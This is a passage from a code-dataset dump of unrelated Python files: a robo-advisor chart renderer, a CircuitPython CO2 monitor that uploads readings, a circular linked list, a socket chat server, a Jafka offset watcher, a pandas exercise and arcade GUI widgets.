self.user_info[7] == self.risk_list[0]:\n tend = \"info5\"\n elif self.user_info[7] == self.risk_list[1]:\n tend = \"info4\"\n elif self.user_info[7] == self.risk_list[2]:\n tend = \"info3\"\n elif self.user_info[7] == self.risk_list[3]:\n tend = \"info2\"\n elif self.user_info[7] == self.risk_list[4]:\n tend = \"info1\"\n\n # 경로별 이미��� 불러오기\n im_tend = Image.open(\n self.path + \"/red/interface/image/\" + folder_path[3] + tend + extension_path\n )\n font = ImageFont.truetype(self.fontpath, 22)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽임\n draw = ImageDraw.Draw(im_tend)\n draw.text((162, 352), str(self.user_info[2]) + (\"세\"), font=font, fill=(b, g, r, a))\n draw.text((162, 391), str(self.user_info[3]) + (\"자\"), font=font, fill=(b, g, r, a))\n draw.text((202, 429.5), str(self.user_info[1]), font=font, fill=(b, g, r, a))\n draw.text((202, 467), str(self.user_info[0]) + (\"만원\"), font=font, fill=(b, g, r, a))\n draw.text((249.3, 506), str(self.user_info[5]), font=font, fill=(b, g, r, a))\n display(im_tend)\n\n def portfolio_viz(self):\n self.to_home_button.on_click(self.RED_start)\n \n if (self.user_info[6] == self.know_list[0]) or (self.user_info[6] == self.know_list[1]):\n danger = Image.open(self.path + \"/red/interface/image/portfolio/위험고지.png\")\n display(danger)\n \n # 관심 산업 상관관계 보여주기\n if self.user_info[5] == self.sector_list[0]:\n s1 = Image.open(self.path + \"/red/interface/image/industry/건설양.png\")\n s2 = Image.open(self.path + \"/red/interface/image/industry/건설음.png\")\n display(s1)\n display(s2)\n elif self.user_info[5] == self.sector_list[5]:\n s3 = Image.open(self.path + \"/red/interface/image/industry/운수장비음.png\")\n display(s3)\n elif self.user_info[5] == self.sector_list[7]:\n s4 = Image.open(self.path + \"/red/interface/image/industry/의약음.png\")\n display(s4)\n\n # 포트폴리오 비율\n capital = self.user_info[0] * 10000\n if self.user_info[7] == self.risk_list[0]:\n r1 = 1\n r2 = 0.67\n elif self.user_info[7] == self.risk_list[1]:\n r1 = 0.8\n r2 = 0.4\n elif self.user_info[7] == self.risk_list[2]:\n r1 = 0.6\n r2 = 0.3\n elif self.user_info[7] == self.risk_list[3]:\n r1 = 0.4\n r2 = 0.1\n elif self.user_info[7] == self.risk_list[4]:\n r1 = 0.2\n r2 = 0\n\n if self.user_info[1] == self.term_list[0] or self.user_info[1] == self.term_list[1]:\n r2 = 0\n\n real_r0 = int((1 - r1) * 100)\n real_r1 = int((r1 - r2) * 100)\n real_r2 = int(r2 * 100)\n \n \n p_profit = 0 ; p_sigma = 0; p_num = 0; p_ratio = 0;\n for equity in (self.portfolios1, self.portfolios2, self.portfolios3):\n p_num += 1\n if p_num == 1:\n p_ratio = 1-r1\n elif p_num == 2:\n p_ratio = r2\n else:\n p_ratio = r1-r2\n cnt = 0 ; profit = 0; sigma = 0;\n \n for name, info in equity.items():\n cnt += info[0]\n profit += info[1][-2]*info[0]\n sigma += info[1][-1]*info[0]\n if cnt > 0 :\n profit /= cnt; sigma /= cnt;\n \n p_profit += profit * p_ratio \n p_sigma += sigma * p_ratio\n\n 수익률 = round(((1+p_profit/100)**12-1)*100,2)\n 표준편차 = round(p_sigma*100,2)\n\n # 파이 차트 생성\n if r2 == 0:\n ratio = [real_r0, real_r1]\n labels = [\"주식\", \"일반 ETF\"]\n colors = [\"silver\", \"gold\"]\n wedgeprops = {\"width\": 0.7, \"edgecolor\": \"w\", \"linewidth\": 5}\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n matplotlib.rc(\"font\", family=font_name)\n\n fig = plt.figure(figsize=(7, 7))\n\n plt.pie(\n ratio,\n labels=labels,\n startangle=90,\n autopct=\"%.0f%%\",\n shadow=True,\n textprops={\"fontsize\": 20},\n colors=colors,\n wedgeprops=wedgeprops,\n )\n if real_r0 == 19:\n 
plt.legend(labels, fontsize=13, loc=\"lower left\")\n else:\n plt.legend(labels, fontsize=13, loc=\"upper left\")\n plt.savefig(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n plt.close()\n else:\n ratio = [real_r0, real_r1, real_r2]\n labels = [\"주식\", \"일반 ETF\", \"채권 ETF\"]\n colors = [\"silver\", \"gold\", \"lightgray\"]\n wedgeprops = {\"width\": 0.7, \"edgecolor\": \"w\", \"linewidth\": 5}\n\n fm.get_fontconfig_fonts()\n font_name = fm.FontProperties(fname=self.fontpath).get_name()\n matplotlib.rc(\"font\", family=font_name)\n\n fig = plt.figure(figsize=(7, 7))\n\n plt.pie(\n ratio,\n labels=labels,\n startangle=90,\n autopct=\"%.0f%%\",\n shadow=True,\n textprops={\"fontsize\": 20},\n colors=colors,\n wedgeprops=wedgeprops,\n )\n if real_r0 == 19:\n plt.legend(labels, fontsize=13, loc=\"lower right\")\n else:\n plt.legend(labels, fontsize=13, loc=\"lower left\")\n plt.savefig(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n plt.close()\n\n # 경로별 이미지 불러오기\n im_tend = Image.open(self.path + \"/red/interface/image/portfolio/red.png\")\n im_chart = Image.open(self.path + \"/red/interface/image/portfolio/pie_chart.png\")\n font = ImageFont.truetype(self.fontpath, 22)\n\n # 칼라 설정\n b, g, r, a = 0, 0, 0, 0\n\n # 이미지에 텍스트 삽입\n draw = ImageDraw.Draw(im_tend)\n draw.text((228, 80.5), \"연 \" + str(수익률) + \"% 내외 추구\", font=font, fill=(b, g, r, a))\n draw.text((228, 244), \"평균 위험률 연 \" + str(표준편차) + \"%\", font=font, fill=(b, g, r, a))\n draw.text((228, 405), \"전체 주식 비중 \" + str(real_r0) + \"% 수준\", font=font, fill=(b, g, r, a))\n\n # 이미지에 파이차트 삽입\n im_tend.paste(im_chart, (510, 10))\n\n display(im_tend)","sub_path":"3. 로보어드바이저/red/red.py","file_name":"red.py","file_ext":"py","file_size_in_byte":37453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141218689","text":"import board\nimport busio\nfrom digitalio import DigitalInOut\nimport adafruit_requests as requests\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nfrom adafruit_esp32spi import adafruit_esp32spi\nimport json\nimport adafruit_scd30\nimport time\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_display_text import label\n\nscd = adafruit_scd30.SCD30(board.I2C())\n# Get wifi details and more from a secrets.py file\ntry:\n f=open('config.json')\n config=json.load(f)\nexcept:\n print(\"error opening config.json!\")\n\nprint(\"ESP32 SPI webclient test\")\n\nTEXT_URL = \"http://wifitest.adafruit.com/testwifi/index.html\"\nJSON_URL = \"http://api.coindesk.com/v1/bpi/currentprice/USD.json\"\n\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.D10)\nesp32_ready = DigitalInOut(board.D9)\nesp32_reset = DigitalInOut(board.D7)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\nrequests.set_socket(socket, esp)\n\nimport board\nimport displayio\nimport terminalio\nfrom adafruit_display_text import label\nimport adafruit_displayio_ssd1306\n\ndisplayio.release_displays()\n\ni2c = board.I2C()\ndisplay_bus = displayio.I2CDisplay(i2c, device_address=0x3C)\ndisplay = adafruit_displayio_ssd1306.SSD1306(display_bus, width=128, height=64)\n\n#splash = displayio.Group()\n#display.show(splash)\n\n#color_bitmap = displayio.Bitmap(128, 32, 1)\n#color_palette = displayio.Palette(1)\n#color_palette[0] = 0xFFFFFF # White\n\n#bg_sprite = displayio.TileGrid(color_bitmap, pixel_shader=color_palette, x=0, 
y=0)\n#splash.append(bg_sprite)\n\n# Draw a smaller inner rectangle\n#inner_bitmap = displayio.Bitmap(118, 24, 1)\n#inner_palette = displayio.Palette(1)\n#inner_palette[0] = 0x000000 # Black\n#inner_sprite = displayio.TileGrid(inner_bitmap, pixel_shader=inner_palette, x=5, y=4)\n#splash.append(inner_sprite)\n\n# Draw a label\n\ntext = \"PVOS.ORG\\nCO2 Monitor\\nREV_T\"\ntext_area = label.Label(terminalio.FONT, text=text, color=0xFFFF00, x=20, y=15)\ndisplay.show(text_area)\n\ntime.sleep(3)\n\nexception_count = 0\nsample_recorded_count = 0\n\n
while True:\n\n    if scd.data_available:\n        try:\n            if (scd.CO2>1):\n                # print(\"Data Available!\")\n                print(\"CO2: %d PPM\" % scd.CO2)\n\n                # print(\"Connecting to AP...\")\n\n                text = str(round(scd.CO2))\n                #font = bitmap_font.load_font(\"/Helvetica-Bold-16.bdf\")\n\n                display.refresh()\n\n                #font = bitmap_font.load_font(\"/Junction-regular-24.bdf\")\n                #font = bitmap_font.load_font(\"/Helvetica-Bold-16.bdf\")\n                font = terminalio.FONT\n                color = 0xFFFF00\n                text_area = label.Label(font=font, text=text, color=color, x=25, y=25)\n                display.show(text_area)\n\n\n                #splash.append(text_area)\n\n
                while not esp.is_connected:\n                    try:\n                        esp.connect_AP(config[\"wifi_ssid\"], config[\"wifi_password\"])\n                    except RuntimeError as e:\n                        print(\"could not connect to AP, retrying: \", e)\n                        continue\n                # print(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\n                # print(\"My IP address is\", esp.pretty_ip(esp.ip_address))\n                # print(\n                #     \"IP lookup adafruit.com: %s\" % esp.pretty_ip(esp.get_host_by_name(\"adafruit.com\"))\n                # )\n                # print(\"Ping google.com: %d ms\" % esp.ping(\"google.com\"))\n\n                # esp._debug = True\n\n
                JSON_POST_URL = \"http://bayou.pvos.org/data/\" + config[\"public_key\"]\n                data = {}\n                data.update({'private_key':config[\"private_key\"]})\n                data.update({'co2_ppm':scd.CO2})\n                data.update({'node_id':0})\n                data.update({'aux_2': exception_count})\n                data.update({'aux_1' : sample_recorded_count})\n                print(\"POSTing data to {0}: {1}\".format(JSON_POST_URL, data))\n                response = requests.post(JSON_POST_URL, data=data)\n                print(\"Response: \", response.text.rstrip())\n                # print(\"-\" * 40)\n                response.close()\n                sample_recorded_count += 1\n                # print(\"Done!\")\n                time.sleep(1)\n\n                text = \"Uploaded\"\n                text_area = label.Label(terminalio.FONT, text=text, color=0xFFFF00, x=20, y=15)\n                display.show(text_area)\n                time.sleep(2)\n\n
        except Exception as e:\n            print(\"*** Exception: \" + str(e))\n            exception_count += 1\n            # break\n\n\n    time.sleep(2)","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319075029","text":"# CIRCULAR LISTS WORK THE SAME WAY AS LINKED LISTS,\n# BUT INSTEAD OF THE LAST NODE POINTING TO NONE,\n# IT POINTS BACK TO THE ROOT.\n\n# A NEW OBJECT MUST BE INSERTED AT THE SECOND POSITION SO THE LOOP IS NOT BROKEN.\n# CIRCULAR LISTS ARE IDEAL FOR MODELING CONTINUOUS LOOPS OF OBJECTS (E.G. A RACE TRACK).\n\n
class Node:\n\tdef __init__(self, d, n=None, p=None):\n\t\tself.data = d\n\t\tself.next_node = n\n\t\tself.prev_node = p\n\n\tdef __str__(self):\n\t\treturn ('('+str(self.data)+')')\n\nclass CircularLinkedList:\n\tdef __init__(self, r = None):\n\t\tself.root = r\n\t\tself.size = 0\n\n\tdef add(self, d):\n\t\tif self.size == 0:\n\t\t\tself.root = Node(d)\n\t\t\tself.root.next_node = self.root\n\t\telse:\n\t\t\tnew_node = Node(d, self.root.next_node)\n\t\t\tself.root.next_node = 
new_node\n\t\tself.size += 1\n\n\tdef find(self, d):\n\t\tthis_node = self.root\n\t\twhile True:\n\t\t\tif this_node.data == d:\n\t\t\t\treturn d\n\t\t\telif this_node.next_node == self.root:\n\t\t\t\treturn False\n\t\t\tthis_node = this_node.next_node\n\n
\tdef remove(self, d):\n\t\tthis_node = self.root\n\t\tprev_node = None\n\n\t\twhile True:\n\t\t\tif this_node.data == d: # FOUND IT\n\t\t\t\tif prev_node is not None:\n\t\t\t\t\tprev_node.next_node = this_node.next_node\n\t\t\t\telse:\n\t\t\t\t\twhile this_node.next_node != self.root:\n\t\t\t\t\t\tthis_node = this_node.next_node\n\t\t\t\t\tthis_node.next_node = self.root.next_node\n\t\t\t\t\tself.root = self.root.next_node\n\t\t\t\tself.size -= 1\n\t\t\t\treturn True # DELETED\n\t\t\telif this_node.next_node == self.root:\n\t\t\t\treturn False # NOT FOUND\n\t\t\tprev_node = this_node\n\t\t\tthis_node = this_node.next_node\n\n
\tdef print_list(self):\n\t\tif self.root is None:\n\t\t\treturn\n\t\tthis_node = self.root\n\t\tprint(this_node, end='->')\n\t\twhile this_node.next_node != self.root:\n\t\t\tthis_node = this_node.next_node\n\t\t\tprint(this_node, end='->')\n\t\tprint()\n\ncll = CircularLinkedList()\nfor i in [5,7,3,8,9]:\n\tcll.add(i)\n\nprint(\"size= \"+str(cll.size))\nprint(cll.find(8))\nprint(cll.find(12))\n\nmy_node = cll.root\nprint(my_node, end='->')\n\nfor i in range(16): # THE LIST CAN BE CYCLED AS MANY TIMES AS NEEDED.\n\tmy_node = my_node.next_node\n\tprint(my_node, end='->')\nprint()\n\nprint(\"-------------------------\")\n\ncll.print_list()\ncll.remove(8)\nprint(cll.remove(27))\nprint(\"size= \"+str(cll.size))\ncll.remove(5) # REMOVES THE ROOT\ncll.print_list()\nprint(\"size= \"+str(cll.size))","sub_path":"data-structures/ds_circular_linkedlist.py","file_name":"ds_circular_linkedlist.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260749827","text":"import socket\nimport threading\n\n# Task 4\n# SERVER\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('', 14900))\nsock.listen(3)\nclients = []\n\n\n
def add_clients():\n    while True:\n        conn, addr = sock.accept()\n        clients.append(conn)\n        threading.Thread(target=chat, args=[conn, addr]).start()\n\n\ndef chat(conn, addr):\n    print(str(addr))\n    while True:\n        try:\n            a = conn.recv(1024)\n            if not a:\n                break\n            for client in clients:\n                if client == conn:\n                    continue\n                client.sendall(a)\n        except Exception:\n            clients.remove(conn)\n            break\n    conn.close()\n\n\nthreading.Thread(target=add_clients).start()\n","sub_path":"students/K33421/Kustova_Ekaterina/Lr1/Task4/cserver.py","file_name":"cserver.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2190515","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n#Jafka watcher\n#author:imxylz@gmail.com\n#version:0.2\n#date:2012/6/20\n\nimport zookeeper\nimport threading\nimport sys\nimport json\nimport jafka\n\n\ndefault_host=\"10.11.5.145:2181/suc/jafka\"\nZNODE_ACL = [{\"perms\":31,\"scheme\":\"world\",\"id\":\"anyone\"}]\n\ninit_flag = False\nhandle = -1\nconnected = False\n\n
def init_client(host=default_host):\n    global init_flag\n    global handle\n    global connected\n\n    if init_flag: return False\n    init_flag = True\n\n    connected = False\n    cond = threading.Condition()\n    def connection_watcher(handle,type,stat,path):\n        global connected\n        with cond:\n            connected = True\n            cond.notify()\n    with cond:\n        
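# zookeeper.init() returns immediately and establishes the session in the background;\n        # connection_watcher then fires on the ZooKeeper client thread, sets connected = True\n        # under the condition lock and calls notify(), so cond.wait(30.0) below blocks the\n        # caller until the connection is up or the 30-second timeout expires.\n        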
zookeeper.set_debug_level(2)\n handle = zookeeper.init(host,connection_watcher)\n cond.wait(30.0)\n\n if not connected:\n raise Exception(\"Couldn't connect to host -\",host)\n return True\n\ndef normal_path(path,env=\"\"):\n if env: path = env+path\n if path[-1] == '/':\n path = path[0:-1]\n return path\n\ndef get(path):\n init_client()\n global handle\n try:\n (data,stat) = zookeeper.get(handle,path,None)\n return data\n except zookeeper.NoNodeException:\n return None\n\ndef close():\n global handle\n global init_flag\n global connected\n if not init_flag: return\n zookeeper.close(handle)\n init_flag = False\n connected = False\n\n\ndef exists(path):\n init_client()\n global handle\n try:\n return zookeeper.exists(handle,path) is not None\n except zookeeper.NoNodeException:\n return False\n\ndef get_children(path):\n init_client()\n global handle\n return zookeeper.get_children(handle,path)\n\ndef get_topics():\n return get_children('/brokers/topics')\n\n\ndef main(host=default_host):\n init_client(host)\n topics = get_children('/brokers/topics')\n brokerids = get_children('/brokers/ids')\n brokers = dict((brokerid,get('/brokers/ids/'+brokerid)) for brokerid in brokerids)\n #brokers: brokerid => (host,port)\n brokers = dict((brokerid,(v.split(':')[1],int(v.split(':')[2]))) for brokerid,v in brokers.items())\n\n #topic_broker_parts: topic=>((brokerid,parts),(brokerid,parts)...)\n topic_broker_parts = {}\n for topic in topics:\n topicbrokers = get_children('/brokers/topics/'+topic)\n broker_parts = []\n for b in topicbrokers:\n parts = get('/brokers/topics/'+topic+'/'+b)\n broker_parts.append((int(b),int(parts)))\n topic_broker_parts[topic] = broker_parts\n\n groups = get_children('/consumers')\n\n for group in groups:\n cids = get_children('/consumers/%s/ids'%group)\n ccounts = {}\n for cid in cids:\n topic_counts = get('/consumers/%s/ids/%s'%(group,cid))\n topic_count_map = json.loads(topic_counts)\n ccounts[cid] = topic_count_map\n ctopics = get_children('/consumers/%s/offsets'%group)\n\n #records: [(topic,broker,part,coffset,toffset,consumerid),...]\n records = []\n broker_records = {}\n for ctopic in ctopics:\n cparts = get_children('/consumers/%s/offsets/%s'%(group,ctopic))\n for cpart in cparts:\n coffset = get('/consumers/%s/offsets/%s/%s'%(group,ctopic,cpart))\n consumerid = get('/consumers/%s/owners/%s/%s'%(group,ctopic,cpart))\n consumerid = consumerid if consumerid else '-'\n #print('%15s: %20s %s => %13s'%(group,ctopic,cpart,coffset))\n cbroker,cpartition = cpart.split('-')\n record = [ctopic,cbroker,cpartition,coffset,-1,consumerid]\n ######################\n rds = broker_records.get(cbroker,[])\n if not rds: broker_records[cbroker] = rds\n rds.append(record)\n records.append(record)\n\n for broker,rds in broker_records.items():\n (host,port) = brokers[str(broker)]\n consumer = jafka.Consumer(host,port)\n try:\n for record in rds:\n toffset = consumer.getoffsetsbefore(record[0],int(record[2]),-1,1)[0]\n record[4] = toffset\n finally:\n consumer.close()\n\n title=('groupid','topic','part','consumeoffset','totaloffset','backlog','consumerid')\n wid_sep = list(len(x) for x in title)\n records=sorted(records,key=lambda r:r[0]+r[1]+r[2])\n print_records=[]\n for record in records:\n (ctopic,cbroker,cpartition,coffset,toffset,consumerid) = record\n left = int(toffset) - int(coffset)\n pr = (group,ctopic,cbroker+'-'+cpartition,coffset,toffset,left,consumerid)\n print_records.append(pr)\n wid_sep_num = list(len(str(x)) for x in pr)\n for i in range(len(wid_sep)):\n if wid_sep[i] < 
wid_sep_num[i]:\n wid_sep[i] = wid_sep_num[i]\n format_sep=' '.join(list('{:>'+str(x)+'}' for x in wid_sep))\n ptitle = format_sep.format(*title)\n print(ptitle)\n print('-'*len(ptitle))\n for pr in print_records:\n print(format_sep.format(*pr))\n print()\n \n\nif __name__ == '__main__':\n print('Jafka watcher v0.2')\n print()\n try:\n main()\n finally:\n close()\n \n\n\n","sub_path":"clients/python/jafka-watcher.py","file_name":"jafka-watcher.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"527491712","text":"# %load q06_sub_total/build.py\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport sys\nimport os\n#sys.path.append(os.path.join(os.path.dirname(os.curdir)))\nfrom greyatomlib.pandas_guided_project.q05_replace_missing_values.build import q05_replace_missing_values\nfrom greyatomlib.pandas_guided_project.q01_load_data.build import q01_load_data\n\npath1 = 'data/excel-comp-data.xlsx'\npath2 = 'data/scraped.csv'\n\ndef q06_sub_total(path1,path2):\n 'write your solution here'\n df_02 = q01_load_data(path1)\n df_02.loc[len(df_02)] = df_02.iloc[:,6:10].sum(axis=0) \n df_02.fillna(value=0, inplace=True, axis=0)\n \n df_03 = pd.read_csv(path2) \n mapping = dict(zip(df_03['United States of America'].str.lower(), df_03['Unnamed: 6']))\n df_02.insert(loc=5, column='abbr', value='')\n df_02.iloc[:,6]=df_02['state'].map(mapping)\n \n df_02.iloc[6,6] = 'MS'\n df_02.iloc[10,6] = 'TN'\n \n #df_02 = q05_replace_missing_values(path1,path2)\n df_sub = df_02.groupby(['postal-code'])[['account', 'Jan', 'Feb', 'Mar']].sum()\n return df_sub\n\npath1 = 'data/excel-comp-data.xlsx'\npath2 = 'data/scraped.csv'\nq06_sub_total(path1, path2)\n\n\n\n","sub_path":"q06_sub_total/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"119594562","text":"from typing import Tuple, Dict, Optional, Union\nimport arcade\n\n\nclass TextButton:\n \"\"\" Text-based button \"\"\"\n def __init__(self,\n center_x, center_y,\n width, height,\n text,\n font_size=18,\n font_face: Union[str, Tuple[str, ...]] = \"Arial\",\n font_color=None,\n face_color=arcade.color.LIGHT_GRAY,\n highlight_color=arcade.color.WHITE,\n shadow_color=arcade.color.GRAY,\n button_height=2,\n theme=None):\n self.center_x = center_x\n self.center_y = center_y\n self.width = width\n self.height = height\n self.text = text\n\n self.pressed = False\n self.active = True\n self.theme = theme\n\n self.press_action = None\n self.release_action = None\n self.click_action = None\n\n self.button_height = button_height\n self.face_color = face_color\n self.highlight_color = highlight_color\n self.shadow_color = shadow_color\n\n if self.theme is not None:\n self.font = self.theme.font\n else:\n self.font = Font(font_face, font_size, font_color)\n\n def get_top(self):\n return self.center_y + self.height / 2\n\n def get_bottom(self):\n return self.center_y - self.height / 2\n\n def get_left(self):\n return self.center_x - self.width / 2\n\n def get_right(self):\n return self.center_x + self.width / 2\n\n def draw_color_theme(self):\n arcade.draw_rectangle_filled(self.center_x, self.center_y, self.width,\n self.height, self.face_color)\n\n if not self.pressed:\n bottom_and_right_color = self.shadow_color\n top_and_left_color = self.highlight_color\n else:\n bottom_and_right_color = 
self.highlight_color\n top_and_left_color = self.shadow_color\n\n left = self.get_left()\n right = self.get_right()\n top = self.get_top()\n bottom = self.get_bottom()\n\n # draw bottom horizontal line\n arcade.draw_line(left, bottom, right, bottom,\n bottom_and_right_color, self.button_height)\n\n # draw right vertical line\n arcade.draw_line(right, bottom, right, top,\n bottom_and_right_color, self.button_height)\n\n # draw top horizontal line\n arcade.draw_line(left, top, right, top,\n top_and_left_color, self.button_height)\n\n # draw left vertical line\n arcade.draw_line(left, bottom, left, top,\n top_and_left_color, self.button_height)\n\n def draw_texture_theme(self):\n texture_type = \"clicked\" if self.pressed else \"normal\"\n texture = self.theme.button_textures[texture_type]\n\n arcade.draw_texture_rectangle(self.center_x, self.center_y,\n self.width, self.height, texture)\n\n def draw(self):\n \"\"\" Draw the button \"\"\"\n if self.theme:\n self.draw_texture_theme()\n else:\n self.draw_color_theme()\n\n if self.text:\n arcade.draw_text(self.text, self.center_x, self.center_y,\n self.font.color, font_size=self.font.size,\n font_name=self.font.name,\n width=self.width, align=\"center\",\n anchor_x=\"center\", anchor_y=\"center\")\n\n def on_press(self):\n if callable(self.press_action):\n self.press_action()\n\n def on_release(self):\n if callable(self.release_action):\n self.release_action()\n\n def on_click(self):\n if callable(self.click_action):\n self.click_action()\n\n def check_mouse_press(self, x, y):\n if self.check_mouse_collision(x, y):\n self.pressed = True\n self.on_press()\n\n def check_mouse_release(self, x, y):\n if self.pressed:\n self.pressed = False\n\n if self.check_mouse_collision(x, y):\n self.on_release()\n self.on_click()\n\n def check_mouse_collision(self, x, y):\n return (\n self.get_left() <= x <= self.get_right()\n and\n self.get_bottom() <= y <= self.get_top()\n )\n\n\nclass SubmitButton(TextButton):\n \"\"\"\n Deprecated class for create submit button. Use TextButton instead.\n \"\"\"\n def __init__(self, textbox, on_submit, x, y, width=100, height=40, text=\"submit\", theme=None):\n\n from warnings import warn\n warn('SubmitButton has been deprecated. 
Use TextButton instead.', DeprecationWarning)\n\n super().__init__(x, y, width, height, text, theme=theme)\n self.textbox = textbox\n self.click_action = on_submit\n\n def on_click(self):\n super(SubmitButton, self).on_click()\n self.textbox.text_storage.text = \"\"\n self.textbox.text_display.text = \"\"\n\n\nclass DialogueBox:\n def __init__(self, x, y, width, height, color=None, theme=None):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.color = color\n self.active = False\n self.button_list = []\n self.text_list = []\n self.theme = theme\n if self.theme:\n self.texture = self.theme.dialogue_box_texture\n\n def on_draw(self):\n if self.active:\n if self.theme:\n arcade.draw_texture_rectangle(self.x, self.y, self.width,\n self.height, self.texture)\n else:\n arcade.draw_rectangle_filled(self.x, self.y, self.width,\n self.height, self.color)\n\n for button in self.button_list:\n button.draw()\n\n for text in self.text_list:\n text.draw()\n\n def on_mouse_press(self, x, y, _button, _modifiers):\n for button in self.button_list:\n button.check_mouse_press(x, y)\n\n def on_mouse_release(self, x, y, _button, _modifiers):\n for button in self.button_list:\n button.check_mouse_release(x, y)\n\n\nclass TextLabel:\n def __init__(self, text, x, y, color=arcade.color.BLACK, font_size=22,\n anchor_x=\"center\", anchor_y=\"center\", width: int = 0,\n align=\"center\", font_name=('Calibri', 'Arial'),\n bold: bool = False, italic: bool = False, rotation=0):\n self.text = text\n self.x = x\n self.y = y\n self.color = color\n self.font_size = font_size\n self.anchor_x = anchor_x\n self.anchor_y = anchor_y\n self.width = width\n self.align = align\n self.font_name = font_name\n self.bold = bold\n self.italic = italic\n self.rotation = rotation\n self.active = True\n\n def draw(self):\n arcade.draw_text(self.text, self.x, self.y, self.color,\n font_size=self.font_size,\n anchor_x=self.anchor_x, anchor_y=self.anchor_y,\n width=self.width, align=self.align,\n font_name=self.font_name, bold=self.bold,\n italic=self.italic, rotation=self.rotation)\n\n\nclass TextDisplay:\n def __init__(self, x, y, width=300, height=40, outline_color=arcade.color.BLACK,\n shadow_color=arcade.color.WHITE_SMOKE, highlight_color=arcade.color.WHITE, theme=None):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.outline_color = outline_color\n self.shadow_color = shadow_color\n self.highlight_color = highlight_color\n self.highlighted = False\n self.text = \"\"\n self.left_text = \"\"\n self.right_text = \"\"\n self.symbol = \"|\"\n self.cursor_index = 0\n self.theme = theme\n if self.theme:\n self.texture = self.theme.text_box_texture\n self.font_size = self.theme.font_size\n self.font_color = self.theme.font_color\n self.font_name = self.theme.font_name\n else:\n self.texture = None\n self.font_size = 24\n self.font_color = arcade.color.BLACK\n self.font_name = ('Calibri', 'Arial')\n\n def draw_text(self):\n if self.highlighted:\n arcade.draw_text(self.text[:self.cursor_index] + self.symbol + self.text[self.cursor_index:],\n self.x-self.width/2.1, self.y, self.font_color, font_size=self.font_size,\n anchor_y=\"center\", font_name=self.font_name)\n else:\n arcade.draw_text(self.text, self.x-self.width/2.1, self.y, self.font_color, font_size=self.font_size,\n anchor_y=\"center\", font_name=self.font_name)\n\n def color_theme_draw(self):\n if self.highlighted:\n arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height, self.highlight_color)\n else:\n 
arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height, self.shadow_color)\n self.draw_text()\n arcade.draw_rectangle_outline(self.x, self.y, self.width, self.height, self.outline_color, 2)\n\n def texture_theme_draw(self):\n arcade.draw_texture_rectangle(self.x, self.y, self.width, self.height, self.texture)\n self.draw_text()\n\n def draw(self):\n if self.texture == \"\":\n self.color_theme_draw()\n else:\n self.texture_theme_draw()\n\n def on_press(self):\n self.highlighted = True\n\n def on_release(self):\n pass\n\n def check_mouse_press(self, x, y):\n if x > self.x + self.width / 2:\n self.highlighted = False\n return\n if x < self.x - self.width / 2:\n self.highlighted = False\n return\n if y > self.y + self.height / 2:\n self.highlighted = False\n return\n if y < self.y - self.height / 2:\n self.highlighted = False\n return\n self.on_press()\n\n def check_mouse_release(self, _x, _y):\n if self.highlighted:\n self.on_release()\n\n def update(self, _delta_time, text, symbol, cursor_index):\n self.text = text\n self.symbol = symbol\n self.cursor_index = cursor_index\n\n\nclass TextStorage:\n def __init__(self, box_width, font_size=24, theme=None):\n self.box_width = box_width\n self.font_size = font_size\n self.theme = theme\n if self.theme:\n self.font_size = self.theme.font_size\n self.char_limit = self.box_width / self.font_size\n self.text = \"\"\n self.cursor_index = 1\n self.cursor_symbol = \"|\"\n self.local_cursor_index = 0\n self.time = 0.0\n self.left_index = 0\n self.right_index = 1\n self.visible_text = \"\"\n\n def blink_cursor(self):\n seconds = self.time % 60\n if seconds > 0.1:\n if self.cursor_symbol == \"_\":\n self.cursor_symbol = \"|\"\n else:\n self.cursor_symbol = \"_\"\n self.time = 0.0\n\n def update(self, delta_time, key):\n self.time += delta_time\n # self.blink_cursor()\n if key:\n if key == arcade.key.BACKSPACE:\n if self.cursor_index < len(self.text):\n text = self.text[:self.cursor_index-1]\n self.text = text + self.text[self.cursor_index:]\n else:\n self.text = self.text[:-1]\n if self.cursor_index > 0:\n self.cursor_index -= 1\n if self.left_index > 0:\n self.left_index -= 1\n if self.right_index > 1:\n self.right_index -= 1\n elif key == arcade.key.LEFT:\n if self.cursor_index > 0:\n self.cursor_index -= 1\n if 0 < self.left_index == self.cursor_index:\n self.left_index -= 1\n self.right_index -= 1\n elif key == arcade.key.RIGHT:\n if self.cursor_index < len(self.text):\n self.cursor_index += 1\n if len(self.text) > self.right_index == self.cursor_index:\n self.right_index += 1\n self.left_index += 1\n else:\n if self.cursor_index < len(self.text):\n self.text = self.text[:self.cursor_index] + chr(key) + self.text[self.cursor_index:]\n self.cursor_index += 1\n 